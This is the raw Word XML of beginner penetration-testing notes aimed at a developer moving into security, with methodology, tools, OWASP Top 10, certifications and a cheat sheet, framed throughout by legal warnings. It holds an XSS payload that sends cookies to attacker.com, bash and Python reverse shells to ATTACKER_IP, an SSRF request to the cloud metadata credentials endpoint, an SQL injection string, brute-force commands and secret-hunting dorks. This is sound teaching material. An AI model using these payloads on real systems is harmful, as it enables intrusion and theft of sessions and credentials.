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202C"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0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Complete Beginner Notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="6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For developers pivoting to cybersecurity  •  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Updated 2025</w:t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1. What is Penetration Testing?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Pentesting is authorized simulated attacking of a system to find security weaknesses before real attackers do. You think and act like an attacker — but with written permission.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thick" w:color="E53E3E" w:sz="12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⚠️ Legal requirement: </w:t>
            </w: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Without written authorization, any of these actions are criminal offenses. In Nepal, this falls under the IT &amp; Cyber Act (ITCA 2063). Always get a signed Rules of Engagement (RoE) document first.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1.1 Types by Information Given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know going in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Black Box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Nothing. Simulate a full external attacker. Most realistic scenario.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Grey Box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Partial info — maybe a user account or some architecture docs. Most common in real engagements.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White Box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access — source code, architecture, credentials. Most thorough. Used for internal audits.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1.2 Types by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Network / Infrastructure — open ports, running services, lateral movement inside a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Web Application — the most common type; OWASP Top 10 is your primary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API Testing — broken auth, excessive data exposure, rate-limit abuse on REST/GraphQL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Mobile — Android/iOS app analysis, certificate pinning bypass, local storage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Social Engineering — phishing simulations, vishing, physical access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Cloud — IAM misconfigs, S3 bucket exposure, SSRF to cloud metadata service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thick" w:color="38A169" w:sz="12"/>
              <w:bottom w:val="single" w:color="E2E8F0" w:sz="1"/>
              <w:right w:val="single" w:color="E2E8F0" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EB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💡 Dev advantage: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="276749"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">You already understand HTTP, REST APIs, authentication flows, and how code gets built. This gives you a massive head start for web app and API pentesting. You can read source code, understand what a developer intended, and spot where they cut corners.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2. Pentest Methodology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Most frameworks (PTES, OWASP Testing Guide, OSSTMM) follow the same lifecycle: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 Reconnaissance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Gather info without triggering alarms. OSINT, Google dorking, Shodan.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What is the attack surface?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2. Scanning &amp; Enumeration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Active scanning — ports, services, OS versions, usernames, shares.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What is running and what version?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3. Vulnerability Analysis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Match discovered services/versions to known CVEs and misconfigs.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What can I exploit?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4. Exploitation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Actively attempt to exploit confirmed vulnerabilities to gain access.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Can I get in?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 Post-Exploitation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Privilege escalation, data exfil, lateral movement, persistence.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What can I do from here?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6. Reporting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Document every finding: severity, reproduction steps, business impact, fix recommendation.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How do I communicate this clearly?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Reconnaissance: Passive vs Active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distinction matters legally — passive recon doesn't require permission; active recon does.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 (no permission needed)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(requires written authorization)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Google dorking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Nmap port scans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WHOIS lookups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Directory brute-forcing (ffuf)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Shodan searches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Sending crafted HTTP requests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Certificate transparency (crt.sh)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Subdomain enumeration via DNS queries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LinkedIn OSINT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Banner grabbing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Wayback Machine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Vulnerability scanning (nuclei)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Useful Google Dorks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site:target.com filetype:pdf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site:target.com inurl:admin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site:target.com intitle:"index of"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"@target.com" site:linkedin.com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site:target.com ext:env OR ext:config OR ext:bak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inurl:target.com "api_key" OR "secret" OR "password"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2.3 Scope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thick" w:color="E53E3E" w:sz="12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⚠️ Scope discipline: </w:t>
            </w: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Always verify if a subdomain, IP range, or third-party service is in scope before touching it. Shared hosting = you could hit innocent third parties. CDNs, cloud providers, and payment processors are almost always out of scope.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3. Core Tools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Reconnaissance &amp; OSINT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nmap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Port scanning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nmap -sV -sC -A -p- &lt;target&gt;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Learn -sV (version), -sC (default scripts), -A (aggressive)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theHarvester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OSINT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theHarvester -d target.com -b google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Emails, subdomains, employee names from public sources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Shodan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Passive recon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shodan search apache hostname:target.com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Find exposed services before touching the target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subfinder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Subdomain enum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subfinder -d target.com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Passive subdomain discovery via OSINT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crt.sh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SSL/TLS recon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crt.sh/?q=%.target.com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Certificate transparency logs reveal subdomains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Burp Suite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proxy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Set browser proxy → 127.0.0.1:8080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Industry standard. Community edition is free. Start here.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ffuf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Fuzzing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ffuf -w wordlist.txt -u http://target/FUZZ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Directory brute-force, parameter discovery, vhost enum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sqlmap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SQLi automation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sqlmap -u "http://target/?id=1" --dbs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Don't use blindly — understand what it does first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nuclei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Template scanning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nuclei -u https://target.com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5000+ community templates, great for quick recon passes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nikto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scanning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nikto -h http://target.com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Old but still useful for quick misconfig checks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wfuzz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fuzzing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wfuzz -c -z file,wordlist.txt http://target/FUZZ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Alternative to ffuf, good for cookie/header fuzzing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3.3 Network &amp;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Metasploit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Exploit framework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msfconsole → search &lt;vuln&gt; → use → exploit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Modules for hundreds of known CVEs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Wireshark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Packet capture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Capture on interface, filter: http / dns / tcp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Understand protocols at the wire level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netcat (nc)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Swiss Army knife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nc -lvnp 4444 (listener) / nc target 80 (connect)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Reverse shells, port scanning, banner grabbing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hashcat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Password cracking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hashcat -m 0 hash.txt wordlist.txt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GPU-accelerated, supports MD5, bcrypt, NTLM, SHA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hydra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Brute-forcing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hydra -l admin -P pass.txt target http-post-form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Online password attacks against login forms, SSH, FTP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3.4 Practice Environments (Legal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point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Hack The Box (HTB)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Real-world style machines, industry recognized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Starting Point → Tier 0 machines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TryHackMe (THM)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Structured learning rooms, beginner-friendly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Jr Penetration Tester path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PortSwigger Web Academy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app testing — completely free, excellent labs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 injection → Authentication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DVWA (local)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Deliberately Vulnerable Web App — run locally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docker pull vulnerables/web-dvwa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WebGoat (local)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OWASP's intentionally insecure Java app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docker pull webgoat/goat-and-wolf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VulnHub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Downloadable vulnerable VMs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Kioptrix Level 1 is a classic starter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4. Vulnerability Types (OWASP Top 10)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are the most critical web application security risks. As a full-stack developer, you have likely introduced some of these unintentionally.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4.1 Injection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input reaches an interpreter without sanitization. SQL, NoSQL, LDAP, OS commands.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Classic SQL injection: ' OR 1=1--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Impact: full database dump, authentication bypass, OS command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Fix: parameterized queries / prepared statements, never string concatenation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-- Vulnerable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SELECT * FROM users WHERE id = '' + userId + '';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-- Safe (parameterized)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SELECT * FROM users WHERE id = ?  -- pass userId as parameter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4.2 Broken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Weak / default passwords, missing rate limiting on login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Insecure session tokens — predictable, not rotated after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'Remember me' tokens that never expire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Missing MFA on admin interfaces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4.3 Cross-Site Scripting (XSS)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Reflected XSS — payload in URL, server echoes it back unescaped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Stored XSS — payload saved to DB, executes for every user who views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DOM-based XSS — client-side JS reads attacker-controlled data into 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Impact: cookie theft, session hijacking, keylogging, phishing redirects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&lt;script&gt;document.location='http://attacker.com/?c='+document.cookie&lt;/script&gt;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4.4 IDOR (Insecure Direct Object Reference)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Extremely common, especially in REST APIs. Change an ID in a request to access another user's data.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GET /api/invoices/1337   →   change to   →   GET /api/invoices/1338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Fix: always check that the authenticated user owns the requested resource (authorization check, not just authentication)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4.5 SSRF (Server-Side Request Forgery)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Make the server fetch a URL you control — often used to reach internal services or cloud metadata.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POST /fetch-url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url=http://169.254.169.254/latest/meta-data/iam/security-credentials/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AWS/GCP metadata endpoint (169.254.169.254) is the critical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Can lead to credential exfiltration, internal port scanning, RCE in some cases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4.6 Security Misconfiguration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Default credentials left in place (admin:admin, admin:password)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Debug endpoints or verbose error messages exposed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S3 buckets with public read/write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Unnecessary HTTP methods enabled (PUT, DELETE, TRACE)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Missing security headers (CSP, HSTS, X-Frame-Options)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4.7 CVSS Severity Scoring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finding you report needs a severity score. CVSS (Common Vulnerability Scoring System) is the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9.0 – 10.0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Remote unauthenticated RCE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Fix immediately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7.0 – 8.9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 injection with data access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Fix within 7 days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4.0 – 6.9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IDOR on non-sensitive data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Fix within 30 days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0.1 – 3.9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Missing security header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Fix in next sprint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Default error page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Best practice fix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5. Essential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CVE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Common Vulnerabilities and Exposures. A numbered, publicly catalogued vulnerability. e.g. CVE-2021-44228 = Log4Shell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Exploit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 or technique that takes advantage of a vulnerability to cause unintended behavior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Payload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The part of an exploit that does the actual work — a reverse shell, file read, etc. — after the vulnerability is triggered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Shell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Command-line access on a compromised target. Reverse shell = target connects back to attacker. Bind shell = attacker connects to target.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Going from low-privilege (www-data) to high-privilege (root/SYSTEM). Horizontal = same level, different account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Moving from one compromised machine to other machines in the same network using harvested credentials or exploits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C2 / C&amp;C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Command and Control. Infrastructure attackers use to communicate with compromised machines (Cobalt Strike, Havoc, Empire)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Systematically extracting information — usernames, shares, service versions. You cannot exploit what you have not found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Attack Surface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Everything exposed and reachable by an attacker — ports, endpoints, login pages, APIs, employees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Zero-Day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 vulnerability with no public patch yet. Rare in real engagements — most pentesting exploits known vulns on unpatched systems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Proof of Concept. A minimal exploit demonstrating a vulnerability exists, without causing full damage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 Team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Full-scope, long-running adversary simulation (stealth matters). Blue Team = defenders. Purple = both collaborating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Mechanisms an attacker uses to maintain access after a reboot — cron jobs, startup scripts, backdoor users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Pivoting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Using a compromised machine as a relay to reach systems that are not directly accessible from the attacker's machine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Remote Code Execution. The most critical class of vulnerability — executing arbitrary commands on a target system remotely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Point of Presence — an entry point into a network or system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The process of extracting usernames, machine names, network resources, shares, and services from a system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6. Learning Roadmap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practical sequence from developer background to employable security skillset — designed for 1–2 hours/day study time.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Phase 1 — Foundation (Weeks 1–4)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Networking fundamentals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TCP/IP stack, DNS, HTTP/S request lifecycle, OSI model, subnetting basics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Resource: TryHackMe 'Pre-Security' path — free and well-structured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Without this, tool output is meaningless noise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Linux command line fluency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File system layout, permissions (chmod/chown), processes, bash scripting, grep/awk/sed pipelines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You're on Arch Linux — you are likely already past this step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Phase 2 — Web App Focus (Weeks 5–12)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thick" w:color="38A169" w:sz="12"/>
              <w:bottom w:val="single" w:color="E2E8F0" w:sz="1"/>
              <w:right w:val="single" w:color="E2E8F0" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EB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💡 Why start here: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="276749"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web app security is where your dev background gives you the biggest advantage. You already understand the attack surface from the inside.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OWASP Top 10 in depth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Set up DVWA locally, intercept every request with Burp Suite, manually exploit each class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PortSwigger Web Security Academy — free, lab-based, industry-respected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Burp Suite fundamentals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Proxy, Repeater, Intruder, Decoder — know these before anything else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Practice intercepting your own React apps first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Phase 3 — Practice Labs (Ongoing)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here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TryHackMe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Structured skill-building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Jr Penetration Tester path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Hack The Box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Real machine challenges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Starting Point → Tier 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PortSwigger Academy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app labs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 Injection topic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Bug Bounty (HackerOne)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Real targets, real rewards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Focus: IDOR, auth issues, info disclosure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Phase 4 —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eJPT (eLearnSecurity)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Best first cert. Practical exam, affordable (~$200). Covers fundamentals well.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CEH (EC-Council)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Common requirement for Nepali government/corporate security jobs. More theory-heavy.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CompTIA Security+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Recognized internationally. Good baseline for job applications.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OSCP (Offensive Security)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The gold standard. Fully practical 24-hour exam. Target after 1+ year of labs.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BSCP (PortSwigger)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Burp Suite Certified Practitioner — excellent web-specific credential, free to attempt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Phase 5 — Specialization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From a developer background, this progression makes the most sense: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Web application security → API security → Cloud security (AWS/GCP)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All three pay well and have strong demand internationally and for remote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Bug bounty runs in parallel — start on HackerOne or Bugcrowd with broad-scope programs</w:t>
      </w:r>
    </w:p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7. Quick Reference Cheat Sheet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7.1 Nmap Common Flags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nmap -sV -sC -A -p- &lt;target&gt;        # Full aggressive scan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nmap -sn 192.168.1.0/24             # Host discovery (ping sweep)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nmap -sU -p 53,161 &lt;target&gt;          # UDP scan (DNS, SNMP)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nmap -oN output.txt &lt;target&gt;         # Save output to file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7.2 Reverse Shell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thick" w:color="E53E3E" w:sz="12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⚠️ Legal use only: </w:t>
            </w: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Only use reverse shells on systems you own or have explicit written permission to test.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Set up listener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nc -lvnp 4444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Bash reverse shell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bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1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Python reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD5E0" w:sz="1"/>
          <w:bottom w:val="single" w:color="CBD5E0" w:sz="1"/>
          <w:left w:val="thick" w:color="4299E1" w:sz="8"/>
          <w:right w:val="none"/>
        </w:pBdr>
        <w:shd w:fill="F7FAFC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python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'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7.3 Common Ports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attack vector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FTP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Anonymous login, brute force, version exploits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SSH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Brute force, weak keys, old version exploits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80 / 443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HTTP/S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app attacks — entire OWASP Top 10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139 / 445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SMB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EternalBlue (MS17-010), credential relay, null sessions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3306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Default credentials, injection from app layer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3389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RDP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BlueKeep, brute force, credential stuffing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6379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Unauthenticated access, RCE via config write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8080 / 8443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 alt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 panels, dev servers left exposed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7.4 Privilege Escalation Checklist (Linux)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sudo -l — what can current user run as sudo?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find / -perm -4000 2&gt;/dev/null — SUID binaries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cat /etc/crontab — cron jobs running as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env — environment variables with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cat /etc/passwd — world-readable sensitive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ss -tulpn — services listening on localhost only (port forward to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LinPEAS / LinEnum — automated enumeration scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E2E8F0" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="12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PortSwigger Web Security Academy — portswigger.net/web-security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TryHackMe — tryhackme.com (Jr Penetration Tester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Hack The Box — hackthebox.com (Starting Point machines)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OWASP Testing Guide — owasp.org/www-project-web-security-testing-guide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GTFOBins — gtfobins.github.io (Unix binary exploitation)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HackerOne Hacktivity — see real disclosed bug reports for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Exploit-DB — exploit-db.com (searchable CVE/PoC database)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2026-05-14T18:10:33.294Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-14T18:10:33.294Z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